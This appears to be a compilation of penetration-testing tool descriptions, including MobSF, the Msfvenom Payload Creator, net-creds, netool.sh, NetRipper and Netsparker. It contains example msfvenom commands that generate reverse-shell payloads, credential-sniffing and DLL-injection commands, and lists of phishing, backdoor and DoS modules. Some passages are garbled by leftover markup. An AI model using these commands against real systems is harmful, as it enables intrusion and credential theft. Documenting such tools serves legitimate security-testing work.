MobaXterm is your ultimate toolbox for remote computing.

In a single Windows application, it provides loads of functions
that are tailored for programmers, webmasters, IT
administrators and pretty much all users who need to handle
their remote jobs in a more simple fashion.
MobaXterm provides all the important remote network tools
(SSH, X11, RDP, VNC, FTP, MOSH, ...) and Unix commands
(bash, ls, cat, sed, grep, awk, rsync, ...) to Windows desktop, in
a single portable exe file which works out of the box.
There are many advantages of having an All-In-One network
application for your remote tasks, e.g. when you use SSH to
connect to a remote server, a graphical SFTP browser will
automatically pop up in order to directly edit your remote files.
Your remote applications will also display seamlessly on your
Windows desktop using the embedded X server.
You can download and use MobaXterm Home Edition for free.
If you want to use it inside your company, you should consider
subscribing to MobaXterm Professional Edition: this will give
you access to much more features, professional support and
"Customizer" software.
When developing MobaXterm, we focused on a simple aim:
proposing an intuitive user interface in order for you to
efficiently access remote servers through different networks
or systems.
Key features
Embedded X serverFully configured Xserver based on X.org

Easy DISPLAY exportation DISPLAY is exported from remote
Unix to local Windows
X11-Forwarding capability Your remote display uses SSH for
secure transport
Tabbed terminal with SSH Based on PuTTY/MinTTY with
antialiased fonts and macro support
Many Unix/Linux commands on Windows Includes basic
Cygwin commands (bash, grep, awk, sed, rsync,...)
Add-ons and plugins You can extend MobaXterm capabilities
with plugins
Versatile session manager All your network tools in one app:

Rdp, Vnc, Ssh, Mosh, X11, ...
Portable and light application MobaXterm has been
packaged as a single executable which does not require admin
rights and which you can start from an USB stick
Professional application MobaXterm Professional has been
designed for security and stability for very challenging people
MobaXterm plugins
Corkscrew: Corkscrew allows to tunnel TCP connections

through HTTP proxies
Curl: Curl is a command line tool for transferring data with URL
syntax
CvsClient: A command line tool to access CVS repositories
Gcc, G++ and development tools: the GNU C/C++ compiler
and other development tools
DnsUtils: This plugin includes some useful utilities for host
name resolution:
dig, host, nslookup and nsupdate.
E2fsProgs: Utilities for creating, fixing, configuring, and
debugging ext2/3/4 filesystems.
Emacs: The extensible, customizable, self-documenting realtime display editor
Exif: Command-line utility to show EXIF information hidden in
JPEG files.
FVWM2: A light but powerful window manager for X11.
File: Determines file type using magic numbers.
Fontforge: A complete font editor with many features
GFortran: The GNU Fortran compiler.
Git: A fast and powerful version control system.
Gvim: The Vim editor with a GTK interface
Httperf: A tool for measuring web server performance.
Joe: Fast and simple editor which emulates 5 other editors.
Lftp: Sophisticated file transfer program and ftp/http/bittorrent

client.
Lrzsz: Unix communication package providing the XMODEM,
YMODEM ZMODEM file transfer protocols.
Lynx: A text-mode web browser.
MPlayer: The ultimate video player
Midnight Commander: Midnight Commander is a feature rich
text mode visual file manager.
Mosh: MOSH has been included into MobaXterm main
executable in version 7.1 directly in the sessions manager. This
plugin is deprecated.
Multitail: Program for monitoring multiple log files, in the
fashion of the original tail program.
NEdit: NEdit is a multi-purpose text editor for the X Window
System.
Node.js: Node.js is a platform built on Chrome's JavaScript
runtime for easily building fast, scalable network applications.
This plugin does not include NPM.
OpenSSL: A toolkit implementing SSL v2/v3 and TLS
protocols.
PdKsh: A KSH shell open-source implementation.
Perl: Larry Wall's Practical Extracting and Report Language
Png2Ico: Png2Ico Converts PNG files to Windows icon
resource files.
Python: An interpreted, interactive object-oriented
programming language.
Ruby: Interpreted object-oriented scripting language.
Screen: Screen is a terminal multiplexer and window manager
that runs many separate 'screens' on a single physical
character-based terminal.
Sqlite3: Software library that implements a self-contained,
serverless, zero-configuration, transactional SQL database
engine.
SquashFS: mksquashfs and unsquashfs tools allow you to
create/unpack squashfs filesystems from Windows.
Subversion (SVN): Subversion is a powerful version control
system.
Tcl / Tk / Expect: Tcl is a simple-to-learn yet very powerful
language. Tk is its graphical toolkit. Expect is an automation
tool for terminal.
X11Fonts: Complete set of fonts for X11 server.
X3270Suite: IBM 3270 terminal emulator for Windows.
XServers: Xephyr, Xnest, Xdmx, Xvfb and Xfake alternate X11
servers.
Xmllint: A command line XML tool.
Xorg (legacy): The old X11 (Xorg v1.6.5) server: use this
plugin if you have trouble connecting to an old Unix station
through XDMCP.
Zip: Zip compression utility.
DownloadMobaXterm
MOBSF (MOBILE SECURITY FRAMEWORK) - MOBILE
(ANDROID/IOS) AUTOMATED PEN-TESTING FRAMEWORK
Mobile Security Framework (MobSF) is an intelligent, all-in-one

open source mobile application (Android/iOS) automated pentesting framework capable of performing static and dynamic
analysis. We've been depending on multiple tools to carry out

reversing, decoding, debugging, code review, and pen-test and
this process requires a lot of effort and time. Mobile Security
Framework can be used for effective and fast security analysis
of Android and iOS Applications. It supports binaries (APK &
IPA) and zipped source code.
The static analyzer is able to perform automated code review,
detect insecure permissions and configurations, and detect
insecure code like ssl overriding, ssl bypass, weak crypto,
obfuscated codes, improper permissions, hardcoded secrets,
improper usage of dangerous APIs, leakage of sensitive/PII
information, and insecure file storage. The dynamic analyzer
runs the application in a VM or on a configured device and
detects the issues at run time. Further analysis is done on the
captured network packets, decrypted HTTPS traffic, application
dumps, logs, error or crash reports, debug information, stack
trace, and on the application assets like setting files,
preferences, and databases. This framework is highly scalable
that you can add your custom rules with ease. A quick and
clean report can be generated at the end of the tests. We will
be extending this framework to support other mobile platforms
like Tizen, WindowsPhone etc. in future.
Documentation
https://github.com/ajinabraham/Mobile-SecurityFramework-MobSF/wiki/Documentation
Queries
Features Requests: @ajinabraham or

@OpenSecurity_IN .
Open Bugs Here: https://github.com/ajinabraham/YSOMobile-Security-Framework/issues
Screenshots and Sample Report
Static Analysis - Android APK
Static Analysis - iOS IPA
Sample Report: http://opensecurity.in/research/securityanalysis-of-android-browsers.html

v0.8.8 Changelog
New name: Mobile Security Framework (MobSF)
Added Dynamic Analysis
VM Available for Download
Fixed RCE
Fixed Broken Manifest File Parsing Logic
Sqlite DB Support
Fixed Reporting with new PDF report
Rescan Option
Detect Root Detection
Added Requiremnts.txt
Automated Java Path Detection
Improved Manifest and Code Analysis

Fixed Unzipping error for Unix.
Activity Tester Module
Exported Activity Tester Module
Device API Hooker with DroidMon
SSL Certificate Pinning Bypass with JustTrustMe
RootCloak to prevent root Detection
Data Pusher to Dump Application Data
pyWebproxy to decrypt SSL Traffic
v0.8.7 Changelog
Improved Static Analysis Rules
Better AndroidManifest View
Search in Files
v0.8.6 Changelog
Detects implicitly exported component from manifest.
Added CFR decompiler support
Fixed Regex DoS on URL Regex
v0.8.5 Changelog
Bug Fix to support IPA MIME Type: application/x-itunesipa
v0.8.4 Changelog
Improved Android Static Code Analysis speed (2X
performance)
Static Code analysis on Dexguard protected APK.
Fixed a Security Issue - Email Regex DoS.
Added Logging Code.
All Browser Support.
MIME Type Bug fix to Support IE.
Fixed Progress Bar.
v0.8.3 Changelog
View AndroidManifest.xml & Info.plist
Supports iOS Binary (IPA)

Bug Fix for Linux (Ubuntu), missing MIME Type Detection
Check for Hardcoded Certificates
Added Code to prevent from Directory Traversal
Credits
Bharadwaj Machiraju (@tunnelshade_) - For writing

pyWebProxy from scratch
Thomas Abraham - For JS Hacks on UI.
Anto Joseph (@antojosep007) - For the help with
SuperSU.
Tim Brown (@timb_machine) - For the iOS Binary
Analysis Ruleset.
Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with
bugs and feature requests.
Anant Srivastava (@anantshri) - For Activity Tester Idea
Download Mobile-Security-Framework-Mobsf
MOSCA - STATIC ANALYSIS TOOL TO FIND BUGS
Just another Simple static analysis tool to find bugs like a grep
unix command, at mosca have a modules, that was call egg,
each egg is a simple config to find bug at especific language
like PHP,Ruby,ASP etc... Example of egg config at directory
"egg", If Mosca read a line with vunerability of egg in source
code, then, mosca have alert about vulnerability and save at
logs.
Download Mosca
MPC - MSFVENOM PAYLOAD CREATOR
Msfvenom Payload Creator (MPC) is a wrapper to generate

multiple types of payloads, based on users choice. The idea is
to be as simple as possible (only requiring one input) to
produce their payload.
Fully automating msfvenom & Metasploit is the end goal (well
as to be be able to automate MPC itself). The rest is to make
the user's life as easy as possible (e.g. IP selection menu,
msfconsole resource file/commands, batch payload
production and able to enter any argument in any order (in

various formats/patterns)).
The only necessary input from the user should be defining the
payload they want by either the platform (e.g. windows), or the
file extension they wish the payload to have (e.g. exe).
Can't remember your IP for a interface? Don't sweat it,
just use the interface name: eth0.
Don't know what your external IP is? MPC will
discover it: wan.
Want to generate one of each payload? No issue! Try:
loop.
Want to mass create payloads? Everything? Or to
filter your select? ..Either way, its not a problem. Try:
batch (for everything), batch msf (for every Meterpreter
option), batch staged (for every staged payload), or
batch cmd stageless (for every stageless command
prompt)!
Note: This will not try to bypass any anti-virus solutions.
Install
Designed for Kali Linux v1.1.0a+ & Metasploit v4.11+

(nothing else has been tested).
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/
mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc
Help
root@kali:~# mpc -h -v
[*] Msfvenom Payload Creator (MPC v1.3)
[i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/
MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/
HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
[i]
Example: /usr/bin/mpc windows 192.168.1.10
# Windows & manual IP.

[i]
/usr/bin/mpc elf eth0 4444
# Linux, eth0's IP & manual port.

[i]
/usr/bin/mpc stageless cmd py verbose
# Python, stageless command prompt.

[i]
/usr/bin/mpc loop eth1
# A payload for every type, using eth1's IP.

[i]
/usr/bin/mpc msf batch wan
# All possible Meterpreter payloads, using WAN IP.

[i]
/usr/bin/mpc help verbose
# This help screen, with even more information.

[i] <TYPE>:
[i]
+ ASP
[i]
+ ASPX
[i]
+ Bash [.sh]
[i]
+ Java [.jsp]
[i]
+ Linux [.elf]
[i]
+ OSX [.macho]
[i]
+ Perl [.pl]
[i]
+ PHP
[i]
+ Powershell [.ps1]
[i]
+ Python [.py]
[i]
+ Tomcat [.war]
[i]
+ Windows [.exe]
[i] Rather than putting <DOMAIN/IP>, you can do a

interface and MPC will detect that IP address.
[i] Missing <DOMAIN/IP> will default to the IP menu.
[i] Missing <PORT> will default to 443.

[i] <CMD> is a standard/native command prompt/terminal
to interactive with.
[i] <MSF> is a custom cross platform Meterpreter shell,
gaining the full power of Metasploit.
[i] Missing <CMD/MSF> will default to <MSF> where
possible.
[i]
Note: Metasploit doesn't (yet!) support <CMD/MSF>
for every <TYPE> format.

[i] <CMD> payloads are generally smaller than <MSF> and
easier to bypass EMET. Limit Metasploit post modules/
scripts support.
[i] <MSF> payloads are generally much larger than <CMD>,
as it comes with more features.
[i] <BIND> opens a port on the target side, and the
attacker connects to them. Commonly blocked with ingress
firewalls rules on the target.
[i] <REVERSE> makes the target connect back to the
attacker. The attacker needs an open port. Blocked with
engress firewalls rules on the target.
[i] Missing <BIND/REVERSE> will default to <REVERSE>.
[i] <BIND> allows for the attacker to connect whenever
they wish. <REVERSE> needs to the target to be repeatedly
connecting back to permanent maintain access.
[i] <STAGED> splits the payload into parts, making it
smaller but dependent on Metasploit.
[i] <STAGELESS> is the complete standalone payload. More

'stable' than <STAGED>.
[i] Missing <STAGED/STAGELESS> will default to <STAGED>
where possible.
[i]
Note: Metasploit doesn't (yet!) support <STAGED/
STAGELESS> for every <TYPE> format.

[i] <STAGED> are 'better' in low-bandwidth/high-latency
environments.
[i] <STAGELESS> are seen as 'stealthier' when bypassing
Anti-Virus protections. <STAGED> may work 'better' with
IDS/IPS.
[i] More information: https://community.rapid7.com/
community/metasploit/blog/2015/03/25/stagelessmeterpreter-payloads
[i]
https://www.offensive-
security.com/metasploit-unleashed/payload-types/
[i]
https://www.offensive-
security.com/metasploit-unleashed/payloads/
[i] <TCP> is the standard method to connecting back.
This is the most compatible with TYPES as its RAW. Can be
easily detected on IDSs.
[i] <HTTP> makes the communication appear to be HTTP
traffic (unencrypted). Helpful for packet inspection,
which limit port access on protocol - e.g. TCP 80.
[i] <HTTPS> makes the communication appear to be
(encrypted) HTTP traffic using as SSL. Helpful for packet
inspection, which limit port access on protocol - e.g.
TCP 443.
[i] <FIND_PORT> will attempt every port on the target
machine, to find a way out. Useful with stick ingress/

engress firewall rules. Will switch to 'allports' based
on <TYPE>.
[i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to
<TCP>.
[i] By altering the traffic, such as <HTTP> and even
more <HTTPS>, it will slow down the communication &
increase the payload size.
[i] More information: https://community.rapid7.com/
community/metasploit/blog/2011/06/29/meterpreterhttphttps-communication
[i] <BATCH> will generate as many combinations as
possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED
+ STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
[i] <LOOP> will just create one of each <TYPE>.
[i] <VERBOSE> will display more information.
root@kali:~#
Example #1 (Windows, Fully Automated With IP)

root@kali:~# mpc windows 192.168.1.10
[i]
IP: 192.168.1.10
[i] PORT: 443

[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i]
CMD: msfvenom -p windows/meterpreter/reverse_tcp -f
exe --platform windows -a x86 -e generic/none

LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreterstaged-reverse-tcp-443.exe
[i] File (/root/windows-meterpreter-staged-reverse-
tcp-443.exe) already exists. Overwriting...

[i] windows meterpreter created: '/root/windowsmeterpreter-staged-reverse-tcp-443.exe'
[i] MSF handler file: '/root/windows-meterpreter-stagedreverse-tcp-443-exe.rc'
(msfconsole -q -r /root/
windows-meterpreter-staged-reverse-tcp-443-exe.rc)
[?] Quick web server for file transfer?
python -m
SimpleHTTPServer 8080
[*] Done!
root@kali:~#
Example #2 (Linux Format, Fully Automated With Interface and

Port)
root@kali:~# ./mpc elf eth0 4444
[i]
IP: 192.168.103.238
[i] PORT: 4444

[i] TYPE: linux (linux/x86/shell/reverse_tcp)
[i]
CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf
--platform linux -a x86 -e generic/none

LHOST=192.168.103.238 LPORT=4444 > /root/linux-shellstaged-reverse-tcp-4444.elf
[i] linux shell created: '/root/linux-shell-stagedreverse-tcp-4444.elf'
[i] MSF handler file: '/root/linux-shell-staged-reversetcp-4444-elf.rc'
(msfconsole -q -r /root/linux-shell-
staged-reverse-tcp-4444-elf.rc)
[*] Done!
root@kali:~#
python -m
Example #3 (Python Format, Stageless Command Prompt Using

Interactive IP Menu)
root@kali:~# mpc stageless cmd py verbose
[i] Use which interface/IP address?:
[i]
1.) eth0 - 192.168.103.238
[i]
2.) eth1 - 192.168.155.175
[i]
3.) tap0 - 10.10.100.63
[i]
4.) lo - 127.0.0.1
[i]
5.) wan - xx.xx.xx.xx
[?] Select 1-5, interface or IP address: 3

[i]
IP: 10.10.100.63
[i]
PORT: 443
[i]
TYPE: python (python/shell_reverse_tcp)
[i]
SHELL: shell
[i] DIRECTION: reverse

[i]
[i]
STAGE: stageless
METHOD: tcp
[i]
CMD: msfvenom -p python/shell_reverse_tcp -f
raw --platform python -e generic/none -a python

LHOST=10.10.100.63 LPORT=443 > /root/python-shellstageless-reverse-tcp-443.py
[i] python shell created: '/root/python-shell-stagelessreverse-tcp-443.py'
[i] File: ASCII text, with very long lines, with no line
terminators
[i] Size: 4.0K
[i]
MD5: 53452eafafe21bff94e6c4621525165b
[i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9

[i] MSF handler file: '/root/python-shell-stagelessreverse-tcp-443-py.rc'
(msfconsole -q -r /root/python-
shell-stageless-reverse-tcp-443-py.rc)
python -m
[*] Done!
root@kali:~#
To-Do List
Shellcode generation
x64 payloads
IPv6 support
Look into using OS scripting more (powershell_bind_tcp
& bind_perl etc)
DownloadMsfvenom Payload Creator

MYSQL QUERY BROWSER PASSWORD DUMP COMMAND-LINE TOOL TO RECOVER LOST OR
FORGOTTEN PASSWORDS FROM MYSQL QUERY
BROWSER
MySQL Query Browser Password Dump is the free

command-line tool to instantly recover your lost or forgotten
passwords from MySQL Query Browser software.
MySQL Query Browser is a simple software to manage your
MySQL database connections and queries. By default, it stores
all the database login details so that user don't have enter it
everytime.
Our tool helps you to quickly find and decode all the login
username & password details for each database. For each of
the recovered MySQL database connection, it displays
following details,
Login Username
Login Password
Database Schema
MySQL Port
MySQL Host/Server Address
It operates in both automatic and manual mode. You can ask

it to auto detect password file from default location of MySQL
Query Browser or manually provide one. This way, you can not
only recover database passwords from local system but also
from a file copied from remote system easily.
Being command-line tool makes it ideal tool for penetration
testers and forensic investigators. It is fully portable and also
includes installer to help you in local installation & uninstallation.
MySQL Query Browser Password Dumpp works on both 32-bit
& 64-bit platforms starting from Windows XP to Windows 8.
DownloadMySQL Query Browser Password Dump

NET-CREDS - SNIFF PASSWORDS AND HASHES FROM
AN INTERFACE OR PCAP FILE
Thoroughly sniff passwords and hashes from an interface or

pcap file. Concatenates fragmented packets and does not rely
on ports for service identification.
Sniffs
URLs visited
POST loads sent
HTTP form logins/passwords
HTTP basic auth logins/passwords
HTTP searches
FTP logins/passwords
IRC logins/passwords
POP logins/passwords
IMAP logins/passwords
Telnet logins/passwords
SMTP logins/passwords
SNMP community string
NTLMv1/v2 all supported protocols like HTTP, SMB,
LDAP, etc
Kerberos
Examples
Auto-detect the interface to sniff

sudo python net-creds.py
Choose eth0 as the interface

sudo python net-creds.py -i eth0
Ignore packets to and from 192.168.0.2

sudo python net-creds.py -f 192.168.0.2
Read from pcap

python net-creds.py -p pcapfile
DownloadNet-creds
NETOOL.SH - MITM PENTESTING OPENSOURCE T00LKIT
netool.sh toolkit provides a fast and easy way For new arrivals
to IT security pentesting and also to experience users to use
allmost all features that the Man-In-The-Middle can provide
under local lan, since scanning, sniffing and social engeneering
attacks "[spear phishing attacks]"...
An error occurred.
DESCRIPTION
"Scanning - Sniffing - Social Engeneering"

Netool: its a toolkit written using 'bash, python, ruby' that allows
you to automate frameworks like Nmap, Driftnet, Sslstrip,
Metasploit and Ettercap MitM attacks. this toolkit makes it easy
tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle
attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan
networks, TCP/UDP packet manipulation using etter-filters, and
gives you the ability to capture pictures of target webbrowser
surfing (driftnet) also uses macchanger to decoy scans
changing the mac address.
Rootsector: module allows you to automate some attacks over
DNS_SPOOF + MitM (phishing - social engineering) using
metasploit, apache2 and ettercap frameworks. like the
generation of payloads,shellcode,backdoors delivered using
dns_spoof and MitM method to redirect a target to your
phishing webpage.
Recently was introduced "inurlbr" webscanner (by cleiton) that
allow us to search SQL related bugs, using severeal search
engines, also this framework can be used in conjunction with
other frameworks like nmap, (using the flag --comand-vul)
Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' -exploit-get ?0x27 -s report.log --comand-vul 'nmap -Pn -p
1-8080 --script http-enum --open _TARGET_'
Operative Systems Supported
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS

Linux-backtrack (un-continued) | Mac osx (un-continued).
Dependencies
"TOOLKIT DEPENDENCIES"
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet |
Apache2 | sslstrip
"SCANNER INURLBR.php"
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl
* Install zenity | Install nmap | Install ettercap | Install
macchanger | Install metasploit | Install Apache2 *
Features (modules)
"1-Show Local Connections"
"2-Nmap Scanner menu"
->
Ping target
Show my Ip address
See/change mac address
change my PC hostname
Scan Local network
Scan external lan for hosts
Scan a list of targets (list.txt)
Scan remote host for vulns
Execute Nmap command
Search for target geolocation

ping of dead (DoS)
Norse (cyber attacks map)
nmap Nse vuln modules
nmap Nse discovery modules
<- data-blogger-escaped--="" data-bloggerescaped-addon="" data-blogger-escaped-config="" datablogger-escaped-etrieve="" data-blogger-escapedfirefox="" data-blogger-escaped-metadata="" data-bloggerescaped-p="" data-blogger-escaped-pen="" data-bloggerescaped-router="" data-blogger-escaped-tracer="" datablogger-escaped-webcrawler="" data-blogger-escapedwhois="">
retrieve metadata from target website
retrieve using a fake user-agent
retrieve only certain file types
<- data-blogger-escaped--="" data-bloggerescaped-php="" data-blogger-escaped-webcrawler="">
scanner inurlbr.php -> Advanced search with
multiple engines, provided
analysis enables to exploit GET/POST capturing
emails/urls & internal
custom validation for each target/url found. also
the ability to use
external frameworks in conjuction with the
scanner like nmap,sqlmap,etc
or simple the use of external scripts.
<- data-blogger-escaped--="" data-bloggerescaped-automated="" data-blogger-escaped-engeneering=""
data-blogger-escaped-exploits="" data-blogger-escaped-
phishing="" data-blogger-escaped-r00tsect0r="" datablogger-escaped-social="">

package.deb backdoor [Binary linux trojan]
Backdooring EXE Files [Backdooring EXE Files]
fakeupdate.exe [dns-spoof phishing backdoor]
meterpreter powershell invocation payload [by
ReL1K]
host a file attack [dns_spoof+mitm-hosted file]
clone website [dns-spoof phishing keylooger]
Java.jar phishing [dns-spoof+java.jar+phishing]
clone website [dns-spoof + java-applet]
clone website [browser_autopwn phishing Iframe]
Block network access [dns-spoof]
Samsung TV DoS [Plasma TV DoS attack]
RDP DoS attack [Dos attack against target RDP]
website D0S flood [Dos attack using syn packets]
firefox_xpi_bootstarpped_addon automated exploit
PDF backdoor [insert a payload into a PDF file]
Winrar backdoor (file spoofing)
VBScript injection [embedded a payload into a
world document]
".::[ normal payloads ]::."
windows.exe payload
mac osx payload
linux payload
java signed applet [multi-operative systems]
android-meterpreter [android smartphone payload]
webshell.php [webshell.php backdoor]
generate shellcode
[C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
Session hijacking [cookie hijacking]

start a lisenner [multi-handler]
<- data-blogger-escaped-a.="" data-bloggerescaped-about="" data-blogger-escaped-access="" datablogger-escaped-attack="" data-blogger-escaped-aunch=""
data-blogger-escaped-c.="" data-blogger-escaped-check=""
data-blogger-escaped-code="" data-blogger-escapedconfig="" data-blogger-escaped-cupp.py="" data-bloggerescaped-d.="" data-blogger-escaped-database="" datablogger-escaped-db.="" data-blogger-escaped-delete=""
data-blogger-escaped-etter.filters="" data-bloggerescaped-ettercap="" data-blogger-escaped-execute="" datablogger-escaped-files="" data-blogger-escaped-filter=""
data-blogger-escaped-folders="" data-blogger-escapedfor="" data-blogger-escaped-hare="" data-blogger-escapedhow="" data-blogger-escaped-lan="" data-blogger-escapedlocal="" data-blogger-escaped-lock="" data-bloggerescaped-mitm="" data-blogger-escaped-netool="" datablogger-escaped-niff="" data-blogger-escaped-nsspoofing="" data-blogger-escaped-ommon="" data-bloggerescaped-ompile="" data-blogger-escaped-on="" datablogger-escaped-onfig="" data-blogger-escaped-os="" datablogger-escaped-password="" data-blogger-escapedpasswords="" data-blogger-escaped-pics="" data-bloggerescaped-profiler="" data-blogger-escaped-q.="" datablogger-escaped-quit="" data-blogger-escaped-remote=""
data-blogger-escaped-ssl="" data-blogger-escapedtoolkit="" data-blogger-escaped-u.="" data-bloggerescaped-updates="" data-blogger-escaped-urls="" datablogger-escaped-user="" data-blogger-escaped-visited="">
Screenshots
Downloadnetool.sh
NETRIPPER - SMART TRAFFIC SNIFFING FOR
PENETRATION TESTERS
NetRipper is a post exploitation tool targeting Windows systems

which uses API hooking in order to intercept network traffic and
encryption related functions from a low privileged user, being
able to capture both plain-text traffic and encrypted traffic
before encryption/after decryption.
NetRipper was released at Defcon 23, Las Vegas, Nevada.
Abstract
The post-exploitation activities in a penetration test can be

challenging if the tester has low-privileges on a fully patched,
well configured Windows machine. This work presents a

technique for helping the tester to find useful information by
sniffing network traffic of the applications on the compromised
machine, despite his low-privileged rights. Furthermore, the
encrypted traffic is also captured before being sent to the
encryption layer, thus all traffic (clear-text and encrypted) can
be sniffed. The implementation of this technique is a tool called
NetRipper which uses API hooking to do the actions mentioned
above and which has been especially designed to be used in
penetration tests, but the concept can also be used to monitor
network traffic of employees or to analyze a malicious
application.
Tested applications
NetRipper should be able to capture network traffic from: Putty,

WinSCP, SQL Server Management Studio, Lync (Skype for
Business), Microsoft Outlook, Google Chrome, Mozilla Firefox.
The list is not limited to these applications but other tools may
require special support.
Components
NetRipper.exe - Configures and inject the DLL
DLL.dll
- Injected DLL, hook APIs and save data to
files
netripper.rb
- Metasploit post-exploitation module
Command line
Injection: NetRipper.exe DLLpath.dll processname.exe
Example:
NetRipper.exe DLL.dll firefox.exe
Generate DLL:
-h,
--help
Print this help message
-w,
--write
Full path for the DLL to write the
configuration data
-l,
--location
Full path where to save data files
(default TEMP)
Plugins:
-p,
--plaintext
Capture only plain-text data. E.g.
--datalimit
Limit capture size per request.
true
-d,
E.g. 4096
-s,
--stringfinder
Find specific strings. E.g.
user,pass,config
Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096
-s user,pass
Metasploit module
msf > use post/windows/gather/netripper
msf post(netripper) > show options
Module options (post/windows/gather/netripper):
Name
Required
Current Setting
Description
-----------
-------------------------
DATALIMIT
4096
no
The number of bytes to save from requests/responses

DATAPATH
TEMP
Where to save files. E.g. C:\Windows\Temp or TEMP
no
PLAINTEXT
true
no
True to save only plain-text data

PROCESSIDS
no
Process IDs. E.g. 1244,1256

PROCESSNAMES
no
Process names. E.g. firefox.exe,chrome.exe

SESSION
yes
The session to run this module on.

STRINGFINDER
user,login,pass,database,config
no
Search for specific strings in captured data
Set PROCESSNAMES and run.

Metasploit installation (Kali)
1. cp netripper.rb /usr/share/metasploit-framework/modules/
post/windows/gather/netripper.rb
2. mkdir /usr/share/metasploit-framework/modules/post/
windows/gather/netripper
3. g++ -Wall netripper.cpp -o netripper
4. cp netripper /usr/share/metasploit-framework/modules/
post/windows/gather/netripper/netripper
5. cd ../Release
6. cp DLL.dll /usr/share/metasploit-framework/modules/post/
windows/gather/netripper/DLL.dll
PowerShell module
@HarmJ0y Added Invoke-NetRipper.ps1 PowerShell

implementation of NetRipper.exe
Plugins
1. PlainText - Allows to capture only plain-text data

2. DataLimit - Save only first bytes of requests and
responses
3. Stringinder - Find specific string in network traffic
DownloadNetRipper
NETSPARKER 4 - EASIER TO USE, MORE AUTOMATION
AND MUCH MORE WEB SECURITY CHECKS
Netsparker Web Application Security Scanner version 4. The

main highlight of this new version is the new fully automated
Form Authentication mechanism; it does not require you to
record anything, supports 2 factor authentication and other
authentication mechanisms that require a one time code to
work out of the box.
The below is a list of features highlights of the new Netsparker
Web Application Security Scanner version 4.
Configuring New Web Application Security Scans Just Got Easier
This is the first thing you will notice when you launch the new
version of Netsparker Desktop; a more straightforward and
easier to use New Scan dialog. Easy to use software has
become synonymous with Netsparkers scanners and in this
version we raised the bar again, giving the opportunity to many
users to launch web security scans even if they are not that
familiar with web application security.
As seen in the above screenshot all the generic scan settings

you need are ergonomically placed in the right position,
allowing you to quickly configure a new web application security
scan. All of the advanced scan settings, such as HTTP
connection options have been moved to scan policies.
Revamped Form Authentication Support to Scan Password
Protected Areas
The new fully automated form authentication mechanism of
Netsparker Desktop emulates a real user login, therefore even

if tokens or other one time parameters are used by the web
application an out of the box installation of the scanner can still
login in to the password protected area and scan it. For
example in the below example Netsparker is being used to
login to the MailChimp website.
Once you enter the necessary details, mainly the login form
URL and credentials you can clickVerify Login & Logoutto
verify that the scanner can automatically login and identify a
logged in session, as shown in the below screenshot.
You do not have to record any login macros because the new
mechanism is all based on DOM. You just have to enter the
login form URL, username and password and it will

automatically login to the password protected section. We
have tested the new automated form authentication mechanism
on more than 300 live websites and can confirm that while
using an out of the box setup, it works on 85% of the websites.
13% of the remaining edge cases can be fixed by writing 2-5
lines of JavaScript code with Netsparkers new JavaScript
custom script support. Pretty neat, dont you think? The below
are just a few of the login forms we tested.
The new Form Authentication mechanism also supports custom

scripts which can be used to override the scanners behaviour,
or in rare cases where the automated login button detection is
not working. The custom scripting language has been changed
to JavaScript because it is easier and many more users are
familiar with it.
Out of the Box Support for Two-Factor Authentication and

One Time Passwords
The new Form Authentication mechanism of Netsparker
Desktop can also be used to automatically scan websites which
use two-factor authentication or any other type of one time
passwords technologies. Very simple to configure; specify the
login form URL, username and passwords and tick the option
Interactive Login so a browser window automatically prompts
allowing you to enter the third authentication factor during a
web application security scan.
Ability to Emulate Different User Roles During a Scan

To ensure that all possible vulnerabilities in a password
protected area are identified, you should scan it using different
users that have different roles and privileges. With the new
form authentication mechanism of Netsparker you can do just
that! When configuring the authentication details specify
multiple usernames and passwords so in between scans you
just have to select which credentials should be used without the

need to record any new login macros or reconfiguring the
scanner.
Automatically Identify Vulnerabilities in Google Web

Toolkit Applications
Google Web Toolkit, also known as GWT is an open source
framework that gained a lot of popularity. Nowadays many web

applications are being built on it, or using features and
functions from it. Since the web applications that are built with
GWT heavily depend on complex JavaScript, we built a
dedicated engine in Netsparker to support GWT.
This means that you can use Netsparker Desktop to
automatically crawl, scan and identify vulnerabilities and
security flaws in Google Web Toolkit applications.
Identify Vulnerabilities in File Upload Forms

Like with every version or build of Netsparker we release, we
included a number of new security checks in this version.
Though one specific web application security check that is
included in this version needs more attention that the others;
file upload forms vulnerabilities.
From this version onwards Netsparker Desktop will check all
the file upload forms on your websites for vulnerabilities such
forms are typically susceptible for, for example Netsparker tests
that all proper validation checks in a file upload form work and
that they cannot be bypassed by malicious attackers.
Mixed Content Type, Cross-Frame Options, CORS

configuration
We also added various new web security checks mostly around
HTML5 security headers. For example Netsparker now checks

for X-Frame-Options usage, and possible problems in the
implementation of it which can lead to Clickjacking
vulnerabilities and some other security issues.
Another new check is checking the configuration of CORS
headers. Finally in this category we added Mixed Content Type
checks for HTTPS pages and Content Type header analysis for
all of the pages.
XML External Entity (XXE) Engine
Applications that deal with XML data are particularly
susceptible to XML External Entity (XXE) attacks. A successful
exploitation of a XXE vulnerability allows an attacker to launch
other and more grievous malicious attacks, such as code
execution. Since this version, Netsparker automatically checks
websites and web applications for XXE vulnerabilities.
Insecure JSONP Endpoints - Rosetta Flash & Reflected File
Download Attacks
In this version we added a new security check to identify
insecure JSONP endpoints and other controllable endpoints
that can lead to Rosetta Flash or Reflected File Download
